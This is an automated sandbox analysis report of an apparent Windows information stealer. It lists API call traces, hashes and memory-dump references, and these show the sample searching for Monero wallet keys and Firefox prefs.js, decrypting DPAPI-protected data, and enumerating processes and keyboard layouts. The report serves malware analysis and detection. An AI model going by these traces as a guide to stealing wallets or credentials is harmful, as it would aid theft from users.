                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 527e723d8837e66a36ba0a79b3e99283f04bd61621d45eedcb8824b87d164800
                        • Instruction ID: 509c2300d15c9bfcf6766c2727e85ea150bb55788b68159291edc5c338b8247d
                        • Opcode Fuzzy Hash: 527e723d8837e66a36ba0a79b3e99283f04bd61621d45eedcb8824b87d164800
                        • Instruction Fuzzy Hash: 68E1BD729111189BDB94EB64DC52FEE7338AFD5300F4045A9B50B62092EF346F8ACF96
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B15B8,009B0D96), ref: 0099F71E
                        • StrCmpCA.SHLWAPI(?,009B15BC), ref: 0099F76F
                        • StrCmpCA.SHLWAPI(?,009B15C0), ref: 0099F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0099FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: cf1cf5096f68780258c5f8ca6589b02e4cab7be447e41d53fb810c43611e1d2c
                        • Instruction ID: 9de8a0fe205639e2750aced51f12e3741b33abfa63ad5e268555f05f6ca3ea06
                        • Opcode Fuzzy Hash: cf1cf5096f68780258c5f8ca6589b02e4cab7be447e41d53fb810c43611e1d2c
                        • Instruction Fuzzy Hash: 0AB131719001089BDB64FF64DCA6BEEB379AFD5300F4085A9A40A97191EF346B49CFD2
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B510C,?,?,?,009B51B4,?,?,00000000,?,00000000), ref: 00991923
                        • StrCmpCA.SHLWAPI(?,009B525C), ref: 00991973
                        • StrCmpCA.SHLWAPI(?,009B5304), ref: 00991989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00991D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00991DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00991E20
                        • FindClose.KERNEL32(000000FF), ref: 00991E32
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: 745a392a768de646a11c25f1f446787c400dae65a8f91544e4fe09977665fe46
                        • Instruction ID: 39db1fc0327411d2c855510485e7e4082193aac6e3c7a29a4a3a0fc2d4c79723
                        • Opcode Fuzzy Hash: 745a392a768de646a11c25f1f446787c400dae65a8f91544e4fe09977665fe46
                        • Instruction Fuzzy Hash: 1512FA719101189BDB99FB64DC96BEE7378AF95300F4045A9B10B62091EF346F89CFE2
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,009B0C2E), ref: 0099DE5E
                        • StrCmpCA.SHLWAPI(?,009B14C8), ref: 0099DEAE
                        • StrCmpCA.SHLWAPI(?,009B14CC), ref: 0099DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0099E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 75865d342359691019893774ce14f4eb4fb435ad6a2a5eb0163a7dd31470e158
                        • Instruction ID: 8ac3ee6e4f728d3752b63718ccb524e3132827253972b78b2842790e14074fb7
                        • Opcode Fuzzy Hash: 75865d342359691019893774ce14f4eb4fb435ad6a2a5eb0163a7dd31470e158
                        • Instruction Fuzzy Hash: 9EF19C719141189BDB59EB64CC95FEE7338BF95300F8041D9A40B62091EF346F8ACFA6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: D9$^o6;$_X>$d($m5}$tY/~$tY/~$wow$|o{$s{[
                        • API String ID: 0-606133165
                        • Opcode ID: 50b4d92acbe2a1f232b326b9021dd5ccfb2afc87cbac1eb34838fd2a411e3240
                        • Instruction ID: 15297215b5f73c7aed85b95195a11c236d6857ce7419da086418f227988391ef
                        • Opcode Fuzzy Hash: 50b4d92acbe2a1f232b326b9021dd5ccfb2afc87cbac1eb34838fd2a411e3240
                        • Instruction Fuzzy Hash: B0B21BF360C6009FE3046E2DEC8567AFBE9EF94320F1A493DEAC4C7744E97558058696
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009B14B0,009B0C2A), ref: 0099DAEB
                        • StrCmpCA.SHLWAPI(?,009B14B4), ref: 0099DB33
                        • StrCmpCA.SHLWAPI(?,009B14B8), ref: 0099DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0099DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: 05a93f94d07ec8baa687620d032f165d60e234f26f8ef65af8f1801ef98c8df0
                        • Instruction ID: bda622a05f5cf98fc3fd943611341e79a69a531427b44c5b22c5722721e6814b
                        • Opcode Fuzzy Hash: 05a93f94d07ec8baa687620d032f165d60e234f26f8ef65af8f1801ef98c8df0
                        • Instruction Fuzzy Hash: 999120729001049BCF54FBB4EC96AFE737DABC5300F408669B90A96191EF349B59CBD2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        • Associated: 00000000.00000002.2088626675.0000000000990000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000A72000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2088885689.0000000000BDA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000D7F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E66000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000E92000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2089637996.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090116938.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090310752.0000000001049000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2090329232.000000000104A000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 'D}~$)<_$6b|{$@*$CIw$M}z$eDm~$kx}Z$6{
                        • API String ID: 0-816090900
                        • Opcode ID: 0eb286f357a7ed63d7f688ad8e8788cfaad8edb3dfe5909fe8b45ce35e2944e1
                        • Instruction ID: a71d8e120646cd52d1567225f2691f5f02afb643b9adfeb173460e3a7ed8779b
                        • Opcode Fuzzy Hash: 0eb286f357a7ed63d7f688ad8e8788cfaad8edb3dfe5909fe8b45ce35e2944e1
                        • Instruction Fuzzy Hash: 1FA229F360C2049FE3046E2DEC85A7AFBEAEBD4320F16463DE6C4C7744EA3558158696
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,009B05AF), ref: 009A7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 009A7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 009A7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 009A7C62
                        • LocalFree.KERNEL32(00000000), ref: 009A7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: fa13667d803e133043da61db046de0c2df117f514c6c54d7a9026b909ee166c3
                        • Instruction ID: 830b570ff91845546cbfc53ed8c5a0c5b64283dc05d0b3176406d7a9e1a1a6b3
                        • Opcode Fuzzy Hash: fa13667d803e133043da61db046de0c2df117f514c6c54d7a9026b909ee166c3
                        • Instruction Fuzzy Hash: E0414C71941218ABDB64DB94DC9ABEEB378FF85700F2041D9E40A63291DB742F85CFA1
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                          • Part of subcall function 009AA920: lstrcpy.KERNEL32(00000000,?), ref: 009AA972
                          • Part of subcall function 009AA920: lstrcat.KERNEL32(00000000), ref: 009AA982
                          • Part of subcall function 009AA9B0: lstrlen.KERNEL32(?,015B8970,?,\Monero\wallet.keys,009B0E17), ref: 009AA9C5
                          • Part of subcall function 009AA9B0: lstrcpy.KERNEL32(00000000), ref: 009AAA04
                          • Part of subcall function 009AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 009AAA12
                          • Part of subcall function 009AA8A0: lstrcpy.KERNEL32(?,009B0E17), ref: 009AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,009B0D73), ref: 0099E4A2
                        • StrCmpCA.SHLWAPI(?,009B14F8), ref: 0099E4F2
                        • StrCmpCA.SHLWAPI(?,009B14FC), ref: 0099E508
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0099EBDF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 433455689-1173974218
                        • Opcode ID: 6d9f909bdec8295ce094e03abe6431f0a58454c8af016a2c4c2ddf25637c7024
                        • Instruction ID: 1ba7fd50f6a45db3487b19c2f023b0db57210d7a24704e7637d0e703ab0d834d
                        • Opcode Fuzzy Hash: 6d9f909bdec8295ce094e03abe6431f0a58454c8af016a2c4c2ddf25637c7024
                        • Instruction Fuzzy Hash: 1E123B719101189BDB58FB64DDA6BEE7338AFD5300F4041A9B50BA2091EF346F49CBE2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ]s~$BJq$bfOo$q#_U$kOo$kOo
                        • API String ID: 0-1777902374
                        • Opcode ID: e96336ec7cee18c5f7f608c009aff45d41a4ce76074efd2d71d56fbaa1515429
                        • Instruction ID: f07cbf61d4941dcae53d314bf01201ad53ec10dbb5eec1ab6332dac8acc9c513
                        • Opcode Fuzzy Hash: e96336ec7cee18c5f7f608c009aff45d41a4ce76074efd2d71d56fbaa1515429
                        • Instruction Fuzzy Hash: 3FB2A3F360C6009FE3046E2DEC8567ABBE9EFD4720F1A893DE6C4C7744E93598058696
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 3uDw$5(wv$8THC$A1;~$G5[$].n
                        • API String ID: 0-3059217628
                        • Opcode ID: 5559d21dae2ad1119d0d0f8f2bc57c3b92561f9aa86011d764cfb8260c38089a
                        • Instruction ID: 7898289805e26edf0ce15989a2faa7a829bea541d32830f438a2a1e8b0a230d0
                        • Opcode Fuzzy Hash: 5559d21dae2ad1119d0d0f8f2bc57c3b92561f9aa86011d764cfb8260c38089a
                        • Instruction Fuzzy Hash: A1B207F3A0C604AFE3046E29EC8577ABBE9EF94320F16453DEAC4C7744EA3558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: /n}$`qc$v[,|$W[g$?_
                        • API String ID: 0-634233926
                        • Opcode ID: c001470919ba1c060d00167d040c490a8403906b051551d084d44cb41dbc8983
                        • Instruction ID: 5f40fd0525adf72bed0dda08f4ba659b5cfe3978cebeaf9f9bd7c942d53612e0
                        • Opcode Fuzzy Hash: c001470919ba1c060d00167d040c490a8403906b051551d084d44cb41dbc8983
                        • Instruction Fuzzy Hash: 0FB238F3A0C204AFE3046E2DEC8577ABBE9EB94720F1A453DEAC4C7744E93558058697
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: <q8$6lU}$>uy$g^z$z'v/
                        • API String ID: 0-1217020870
                        • Opcode ID: 613e3b5ed3e49d2ec3ac05dc38c8183a475e8e5e4c6e803661a6305447fa21e1
                        • Instruction ID: ccc49dfbd93cc5008bbc3891f392efe88bba1c596d2729ec2312c97bcdf810db
                        • Opcode Fuzzy Hash: 613e3b5ed3e49d2ec3ac05dc38c8183a475e8e5e4c6e803661a6305447fa21e1
                        • Instruction Fuzzy Hash: D6B216F360C200AFE3046E2DEC8567ABBE5EF94720F16893DE6C4C7744EA3598058796
                        APIs
                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0099C871
                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0099C87C
                        • lstrcat.KERNEL32(?,009B0B46), ref: 0099C943
                        • lstrcat.KERNEL32(?,009B0B47), ref: 0099C957
                        • lstrcat.KERNEL32(?,009B0B4E), ref: 0099C978
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcat$BinaryCryptStringlstrlen
                        • String ID:
                        • API String ID: 189259977-0
                        • Opcode ID: fe015fed250e78c5ab918b16b928ca73a486ee56a400a33ea749084c3b4f757a
                        • Instruction ID: 46e25dda77f45a12a0abdf0c80063ae724782bddd656d0f30fb2e6cf926c97f0
                        • Opcode Fuzzy Hash: fe015fed250e78c5ab918b16b928ca73a486ee56a400a33ea749084c3b4f757a
                        • Instruction Fuzzy Hash: 12419EB590421ADFCF10CFA4DD89BEEF7B8BB88304F0041A9E509A7280DB745A84CF91
                        APIs
                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0099724D
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00997254
                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00997281
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 009972A4
                        • LocalFree.KERNEL32(?), ref: 009972AE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                        • String ID:
                        • API String ID: 2609814428-0
                        • Opcode ID: 55d35923f937a3f83977c34d81f856e36484652a76203365e8c62b8bc8e3b220
                        • Instruction ID: bbbef9aa25162f06e361271f0cf623b2aa9856a6d2b1f7c7316bbb35a4fc39f4
                        • Opcode Fuzzy Hash: 55d35923f937a3f83977c34d81f856e36484652a76203365e8c62b8bc8e3b220
                        • Instruction Fuzzy Hash: 7D010075A41208BBDB10DFD8CD55F9EB7B8AB44700F104555FB05AB2C0DA71AA009B65
                        APIs
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009A961E
                        • Process32First.KERNEL32(009B0ACA,00000128), ref: 009A9632
                        • Process32Next.KERNEL32(009B0ACA,00000128), ref: 009A9647
                        • StrCmpCA.SHLWAPI(?,00000000), ref: 009A965C
                        • CloseHandle.KERNEL32(009B0ACA), ref: 009A967A
                        Memory Dump Source
                        • Source File: 00000000.00000002.2088885689.0000000000991000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                        • String ID:
                        • API String ID: 420147892-0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: &$4s|}$$/$q[2
                        • API String ID: 0-3514446365
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2089637996.0000000000BEE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00990000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_990000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: ;?$O\?$cIw?$iT3~
                        • API String ID: 0-1291555467
                        APIs
                          • Part of subcall function 009AA740: lstrcpy.KERNEL32(009B0E17,00000000), ref: 009AA788
                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,009B05B7), ref: 009A86CA
                        • Process32First.KERNEL32(?,00000128), ref: 009A86DE
